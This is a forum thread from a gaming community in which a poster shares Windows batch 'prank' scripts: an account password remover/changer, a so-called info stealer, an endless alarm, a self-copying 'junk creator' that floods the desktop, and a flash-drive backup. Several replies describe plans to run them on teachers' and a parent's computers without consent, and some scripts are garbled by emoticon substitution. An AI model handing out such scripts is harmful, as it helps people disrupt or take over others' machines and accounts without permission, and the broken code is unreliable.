Post: Try These .bat codes! [Trust Me]
03-21-2009, 07:15 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Check these out....

Password Remover / Changer
Changes or removes a password on an account.
    :top
@echo off
color 6e
Title Password Remover/Changer by Shadow Ops
:begin
cls
echo Type the user name you wish to change the password for.
SET /p UDefine=
SET /a UDefine=%UDefine% *
cls
msg * To remove the password, press enter twice.
msg * To change the password, type in the new password. You cant see the characters but it works.
cls
net user %udefine% *
pause>nul
:end











Info Stealer
Creates a .txt file with the computer name, user name, time, and date.
    @echo off
echo Computer Name: %computername%>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo User Name: %username%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Time: %time>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Date: %date%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls



Alarm
Sounds an alarm through the cpu's internal speakers. Turning down volume will not stop it.
    :top

goto top


Junk Creator
Fills your desktop with useless icons until closed.
    cd %userprofile%\desktop
:top
copy %0 %random%.bmp
copy %0 %random%.txt
copy %0 %random%.exe
copy %0 %random%.bat
copy %0 %random%.dat
copy %0 %random%.ini
copy %0 %random%.html
copy %0 %random%.jpeg
copy %0 %random%.mp3
copy %0 %random%.wav
copy %0 %random%.com
copy %0 %random%.cat
copy %0 %random%.ctt
copy %0 %random%.cur
copy %0 %random%.ico
copy %0 %random%.gif
copy %0 %random%.dic
copy %0 %random%.hlp
copy %0 %random%.htm
copy %0 %random%.jpg
copy %0 %random%.py
copy %0 %random%.tmp
copy %0 %random%.web
copy %0 %random%.xhtml
copy %0 %random%.lnk
goto top


Flash Drive Backup
Backs up every thing on your flash drive to a folder called "Flash Drive Backup" on your desktop. *Must be in the root directory of the flash drive.

    @echo off
echo.
echo Backing up your flash drive...
echo.
FOR /F "TOKENS=*" %%A IN ('TIME/T'Winky Winky DO SET TIME=%%A
for /f "tokens=2-4 delims=/ " %%g in ('date /t'Winky Winky do (
set mm=%%g
set dd=%%h
set yy=%%i
)
for /f "tokens=3 delims=\" %%i in ("%USERPROFILE%") do (set user=%%i) 2>&1
if exist "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" (
rd /S /Q "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%"
)
SET time=%time::=.%
xcopy "*" "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" /s /i
echo.
echo Backup Complete!
echo.


-LordOfSpoon
-Shadow Ops
(adsbygoogle = window.adsbygoogle || []).push({});

The following 6 users say thank you to LordOfSpoon™ for this useful post:

ꜛ  , Booshykins, l-MoNsT3R-l, NanuGama, RedKnight
09-09-2009, 09:43 PM #20
Originally posted by e View Post
lol but you dont open them yourself


Which is just common sense
09-12-2009, 08:17 PM #21
dont do the junk thing it will mess up your computer so very time you restart your computer is full of useless junk. So don't even try it. Trust Me !!
09-13-2009, 02:46 AM #22
thats the point of the program
02-23-2010, 05:47 PM #23
duderly
Failed GFXer Winky Winky
I tested most of em..except the junk thingy...the alarm is brilliant...my dad works nights so this will be a nice suprise when he loads up his pc in the morning (Y)

just a query...i know this could possibly never happen but could this make a virus on my pc or be bad or something to damage my laptop ?
02-25-2010, 11:19 AM #24
Originally posted by duderly View Post
I tested most of em..except the junk thingy...the alarm is brilliant...my dad works nights so this will be a nice suprise when he loads up his pc in the morning (Y)

just a query...i know this could possibly never happen but could this make a virus on my pc or be bad or something to damage my laptop ?


No, they will not give you a virus.
02-25-2010, 12:36 PM #25
PrayForPlagues
The Black Key
Omg Im gonna have to do this to my teachers computer, hes chill Smile
02-25-2010, 12:39 PM #26
I'm doing the internal speaker one at school when I get on the teacher's laptop, the look on his/her face will be hilarious! xD
02-25-2010, 10:51 PM #27
wow i never thought of that lol
03-09-2010, 04:41 PM #28
JasonCheung
Can’t trickshot me!
hahah cool ,thanks ..

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo